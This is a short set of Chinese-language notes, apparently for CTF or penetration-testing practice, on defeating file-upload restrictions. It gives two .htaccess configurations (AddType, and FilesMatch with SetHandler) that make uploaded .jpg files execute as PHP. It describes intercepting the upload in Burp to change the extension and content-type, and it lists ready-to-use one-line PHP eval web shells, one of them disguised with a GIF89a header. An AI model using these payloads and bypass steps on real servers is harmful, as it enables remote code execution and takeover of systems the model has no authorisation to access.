*蚁剑不能连jpg,只能连php*
.htaccess文件可以把jpg文件当作php文件来解析
文件上传upload方面有两个方法使用.htaccess进行jpg到php的转换
方法一:
先把一句话木马上传(bp改后缀,改content-type)
再上传文件.htaccess //文件名就叫.htaccess
内容为
AddType application/x-httpd-php .jpg
方法二:
先上传.htaccess文件(这个上传的时候也要改content-type)
内容为:
<FilesMatch "1"> //之后上传的文件名一定要为1.jpg或者1.png
SetHandler application/x-httpd-php
</FilesMatch>
上传成功后再上传一句话木马
另:常用一句话木马
<? @eval($_POST['cyh']);?>
GIF89a
<script language="php">eval($_POST['cyh']);</script>